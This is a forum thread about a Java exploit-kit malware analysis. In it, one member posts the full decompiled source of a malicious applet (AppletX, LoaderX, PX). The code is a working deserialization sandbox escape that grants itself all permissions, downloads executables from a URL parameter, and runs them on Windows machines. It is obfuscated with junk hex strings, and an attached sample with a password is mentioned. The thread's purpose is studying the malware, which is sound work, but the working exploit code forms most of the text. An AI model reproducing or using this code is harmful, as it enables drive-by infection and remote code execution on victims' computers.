Author Topic: JAVA Exploit Kit Malware Analysis  (Read 5342 times)

0 Members and 1 Guest are viewing this topic.

January 06, 2010, 03:47:21 am
Read 5342 times

ratsoul

  • Jr. Member

  • Offline
  • **

  • 23
    • inReverse
Hi all,

I have just published an article about a JAVA Exploit Kit Malware. It uses the Object Serialization exploit. The article is here: http://www.inreverse.net/?p=804.

Regards,
 - ratsoul

January 06, 2010, 09:15:13 am
Reply #1

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Thanks for this interesting article.
Ruining the bad guy's day

February 28, 2010, 09:41:54 am
Reply #2

BADMAN

  • Newbie

  • Offline
  • *

  • 5
Thanks !But I haven't understand how to get a malicious link from .jar file?

March 01, 2010, 11:33:46 am
Reply #3

parody

  • Private Forum
  • Jr. Member

  • Offline
  • *

  • 27
.jar is just a PKzip file. use Winrar/Winzip/7-zip/etc to unpack it.

March 01, 2010, 01:39:07 pm
Reply #4

BADMAN

  • Newbie

  • Offline
  • *

  • 5
.jar is just a PKzip file. use Winrar/Winzip/7-zip/etc to unpack it.
Yes of course)
I have decompile a malicious .jar file :
AppletX.class
Code: [Select]
package myf.y;

import java.applet.Applet;
import java.io.ByteArrayInputStream;
import java.io.ObjectInputStream;

public class AppletX extends Applet
{
  private static final long serialVersionUID = -3238297386635759160L;
  private static String ff = "00057372001B6A6176612E7574696C2E477265676F7";
  private static String as = "00000";
  private static String afc = "44461794";
  private static String afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha = "646549000";
  private static String afcFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFha = "6E69656E744900166D696E696D616C44617973496E46697273745765656B4900096E6578745374616D7049001573657269616C56657273696F6E4F6E53747265616D4A000474696D655B00066669656C64737400025B495B000569735365747400025B5A4C00047A6F6E657400144C6A6176612F7574696C2F54696D655A6";
  private static String lol = "73657269616C56657273696F6E4F6E53747265616D4900087";
  private static String kol = "6F6E7468490007656E6454696D6549000B656E6454696D6";
  private static String gGGGGGGGGLGKGFJDHFDfdfgdhgfsjgfjsdgf7sgfjsdgfhgdf7ysgdfj = "4596561725A000B7573654461796C696768745B000B6D6F6E74684C656E6774687400025B42787200126A6176612E7574696C2E54696D655A6F6E6531B3E9F57744ACA10200014C000249447400124C6A6176612F6C616E672F537472696E673B787074000E4";
  private static String kkk = "2744D6F6E7468490009737461727454696D6549000D7374617";

  private static String asa = "010101010101010101737200186A6176612E7574696C2E53696D706C6554696D655A6F6E65FA675D60D15EF5A603001249000A64737453";
  private static String abc = "B0D0C10200014A0010677265676F7269616E4375746F766572787200126A6176612E7574696C2E43616C656E646172E6EA4D1EC8DC5B8E03000B5A000C6172654669656C647353657449";
  private static String a5 = "sdfsd fsdf hsd fkjw fekwe gfrjkg kj54 tkj nkj4 609hyi9h0009e433333333333333333333333333333333333349tugreo9ug 9rugjjjjjjj9 woiuwwwwwwwwwwwwwwwwwwuqrfj 29fu 09epwoooooooooog poreig iorehg oia;sjhdfiosjgf dhhhhhhhhhhhhh";
  private static String klls = "87001" + as + "0010101" + as + "001" + as + "002" + as + "001" + as + "121563AFC0E757200025B494DBA602676EAB2A5020000787" + as + "0011" + as + "001" + as + "7D9" + as + "004" + as + "015" + as + "004" + as + "012" + as + "08A" + as + "002" + as + "003" + as + "001" + as + "004" + as + "01" + as + "0011" + as + "022" + as + "2DEFE488C" + as + "00000757200025B5A578F203914B85DE2020000787" + as + "00110101010101010101" + asa + "6176696E6773490006656E6" + afc + "9000C656E6" + afc + "F665765656B490007656E644D6F" + afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha + "8656E644D" + kol + "54D6F" + afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha + "97261774F6666736574490015" + lol + "37461727" + afc + "9000E737461727" + afc + "F665765656B49000973746172744D6F" + afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha + "A73";

  private static String a1 = "0007571007E0006" + as + "002" + as + "00000000000787372000D6D79662E792E4C6F61646572585E8B4C67DDC409D8020000787078FFFFF4E";
  private static String a2 = "61727" + gGGGGGGGGLGKGFJDHFDfdfgdhgfsjgfjsdgf7sgfjsdgfhgdf7ysgdfj + "16D65726963612F446177736F6E0036EE8" + as + "00000" + as + "00000" + as + "00000" + as + "00000" + as + "0000FE488C0000000002" + as + "00000" + as + "00000" + as + "00000" + as + "00000" + as + "00000" + as + "000757200025B42ACF317F8060854E002000078700000000C1F1C1F1E1F1E1F1F1E1F1E1F770A" + as + "006" + as + "0000" + a1 + "2F96";

  private static String a31 = "9697354696D655365745A00076C65" + afcFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFha + "F6E6";
  private static String a32 = "000" + a31 + "53B7" + klls + "74617" + kkk + "27454696D654D6F" + afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha + "97374" + a2 + "4A";
  private static String a33 = "C656E6461728F3DD7D6E5" + abc + "000E666972737" + afc + "F665";
  public static String a34 = "43616" + a33 + "765656B5A" + a32 + "C0";

  private final String serializedObject = "ACED" + ff + "269616E" + a34 + "00A";
  public static String data = null;

  public void init()
  {
    try
    {
      String str1 = "000000";
      String str2 = "5469";
      String str3 = "0010677265676F7269616E4375746F766572787200126A6176612E7574696C2E43616C656E646172E6EA4D1EC8DC5B8E03000B5A000C6172654669656C647353657449000E66697273744461794F665765656B5A00096973" + str2 + "6D655365745A00076C656E69656E744900166D696E696D616C44617973496E46697273745765656B4900096E6578745374616D7049001573657269616C56657273696F6E4F6E53747265616D4A000474696D655B00066669656C64737400025B495B000569735365747400025B5A4C00047A6F6E657400144C6A6176612F7574696C2F" + str2 + "6D655A6F6E653B787001" + str1 + "010101" + str1 + "01" + str1 + "02" + str1 + "0100000121563A";
      String str4 = "200014A" + str3 + "FC0E757200025B494DBA602676EAB2A5020000787" + str1 + "011" + str1 + "01000007D9" + str1 + "04" + str1 + "15" + str1 + "04" + str1 + "12" + str1 + "8A" + str1 + "02" + str1 + "03" + str1 + "01" + str1 + "04" + str1 + "1" + str1 + "011" + str1 + "22000002DEFE488C" + str1 + "0000757200025B5A578F203914B85DE2020000787" + str1 + "0110101010101010";
      String str5 = "6444617949000C656E644461794F665765656B490007656E644D6F6465490008656E644D6F6E7468490007656E64" + str2 + "6D6549000B656E64" + str2 + "6D654D6F64654900097261774F666673657449001573657269616C56657273696F6E4F6E53747265616D490008737461727444617949000E73746172744461794F665765656B49000973746172744D6F646549000A73746172744D6F6E74684900097374617274" + str2 + "6D6549000D7374617274" + str2 + "6D654D6F64654900097374617274596561725A000B7573654461796C696768745B000B6D6F6E74684C656E6774687400025B42787200126A6176612E7574696C2E" + str2 + "6D655A6F6E6531B3E9F57744ACA10200014C000249447400124C6A6176612F6C616E672F537472696E673B787074000E416D65726963612F446177736F6E0036EE8" + str1 + "000000000" + str1 + "000000" + str1 + "000000" + str1 + "0000FE4";

      ObjectInputStream localObjectInputStream = new ObjectInputStream(new ByteArrayInputStream(PX.StringToBytes("ACED00057372001B6A6176612E7574696C2E477265676F7269616E43616C656E6461728F3DD7D6E5B0D0C10" + str4 + "101010101010101010101737200186A6176612E7574696C2E53696D706C65" + str2 + "6D655A6F6E65FA675D60D15EF5A603001249000A647374536176696E6773490006656E" + str5 + "88C" + str1 + "0002" + str1 + "000000" + str1 + "000000" + str1 + "000000" + str1 + "000000" + str1 + "0000757200025B42ACF317F8060854E0020000787" + str1 + "00C1F1C1F1E1F1E1F1F1E1F1E1F770A" + str1 + "06" + str1 + "0000007571007E0006" + str1 + "02" + str1 + "0000000000787372000D6D79662E792E4C6F61646572585E8B4C67DDC409D8020000787078FFFFF4E2F964AC000A")));
      Object localObject = localObjectInputStream.readObject();
      if ((localObject != null) && (LoaderX.instance != null))
      {
        String str6 = getParameter("data");

        String str7 = getParameter("cc");

        if (str6 == null)
          str6 = "";
        LoaderX.instance.bootstrapPayload(str6, str7);
      }
    }
    catch (Exception localException)
    {
    }
  }
}
Loader.X.class
Code: [Select]
package myf.y;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.lang.reflect.Field;
import java.net.URL;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;

public class LoaderX extends ClassLoader
  implements Serializable
{
  private static final long serialVersionUID = 6812622870313961944L;
  public static LoaderX instance = null;

  private void writeObject(ObjectOutputStream paramObjectOutputStream)
    throws IOException, ClassNotFoundException
  {
    paramObjectOutputStream.defaultWriteObject();
  }

  private void readObject(ObjectInputStream paramObjectInputStream)
    throws IOException, ClassNotFoundException
  {
    instance = this;
    paramObjectInputStream.defaultReadObject();
  }

  public void bootstrapPayload(String paramString1, String paramString2)
    throws IOException
  {
    Object localObject1 = null;
    try
    {
      ByteArrayOutputStream localByteArrayOutputStream = new ByteArrayOutputStream();

      byte[] arrayOfByte = new byte[8192];

      InputStream localInputStream = super.getClass().getResourceAsStream("/myf/y/PX.class");

      String str = "6E69656E744900166D696E696D616C446179734  96E46697273745765656B4900096E657874537461  6D7049001573657269616C56657273696F6E4F6E53  747265616D4A000474696D655B00066669656C64737400025B495B000569735365747400025B5A4C00047A6F6E657400144C6A6176612F7574696C2F54696D655A6";
      while ((i = localInputStream.read(arrayOfByte)) > 0)
      {
        int i;
        localByteArrayOutputStream.write(arrayOfByte, 0, i); }
      arrayOfByte = localByteArrayOutputStream.toByteArray();
      URL localURL = new URL("file:///");

      Certificate[] arrayOfCertificate = new Certificate[0];
      Permissions localPermissions = new Permissions();
      localPermissions.add(new AllPermission());
      ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(localURL, arrayOfCertificate), localPermissions);
      Class localClass = defineClass("myf.y.PX", arrayOfByte, 0, arrayOfByte.length, localProtectionDomain);
      if (localClass != null)
      {
        Field localField1 = localClass.getField("data");
        Field localField2 = localClass.getField("cc");
        Object localObject2 = localClass.newInstance();
        localField1.set(localObject2, paramString1);
        localField2.set(localObject2, paramString2);
        localObject2 = localClass.newInstance();
      }
    }
    catch (Exception localException)
    {
    }
  }
}
PX.class
Code: [Select]
package myf.y;

import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.net.URL;
import java.security.AccessController;
import java.security.PrivilegedExceptionAction;

public class PX
  implements PrivilegedExceptionAction
{
  public static String data = null;
  public static String cc = null;

  public static byte[] StringToBytes(String paramString)
  {
    byte[] arrayOfByte = new byte[paramString.length() / 2];
    String str = "sdjffjjjjjjjjjjsdfsduuuujf8ds";
    for (int i = 0; i < paramString.length(); i += 2) {
      arrayOfByte[(i / 2)] = (byte)((Character.digit(paramString.charAt(i), 16) << 4) + Character.digit(paramString.charAt(i + 1), 16));
    }
    return arrayOfByte;
  }

  public Object run()
    throws Exception
  {
    if (data == null)
      return null;
    try
    {
      String str1 = "os.name";
      String str2 = "00057372001B6A6176612E7574696C2E477265676F7";
      String str3 = "Windows";
      String str4 = System.getProperty(str1);
      String str5 = "00057372001B6A6176612E7574696C2E477265676Fasd7";
      if (str4.indexOf(str3) >= 0)
      {
        int i = 1;
        if (cc != null)
          i = Integer.parseInt(cc);
        for (int j = 0; j < i; ++j)
        {
          URL localURL = new URL(data + Integer.toString(j));
          localURL.openConnection();
          InputStream localInputStream = localURL.openStream();
          String str6 = "6E69656E744900166D696E696D616C44617973496E46697273745765656B4900096E6578745374616D7049001573657269616C56657273696F6E4F6E53747265616D4A000474696D655B00066669656C64737400025B495B000569735365747400025B5A4C00047A6F6E657400144C6A6176612F7574696C2F54696D655A6";
          String str7 = System.getProperty("java.io.tmpdir") + File.separator + Math.random() + ".exe";
          FileOutputStream localFileOutputStream = new FileOutputStream(str7);

          for (int l = 0; (k = localInputStream.read()) != -1; ++l)
          {
            int k;
            localFileOutputStream.write(k);
          }
          localInputStream.close();
          localFileOutputStream.close();
          String str8 = "6E69656E744900166D696E696D616C44617973496E    46697273745765656B4900096E6578745374616D704   9001573657269616C56657273696F6E4F6E53747265   616D4A000474696D655B00066669656C64737400025B495B000569735365747400025B5A4C00047A6F6E657400144C6A6176612F7574696C2F54696D655A6";
          if (l >= 1024)
            Runtime.getRuntime().exec(str7);
        }
      }
    }
    catch (Exception localException) {
    }
    return null;
  }

  public PX()
  {
    try
    {
      AccessController.doPrivileged(this);
    }
    catch (Exception localException)
    {
    }
  }
}
So how to get a malicious link?
Here is attached file.........
pass:infected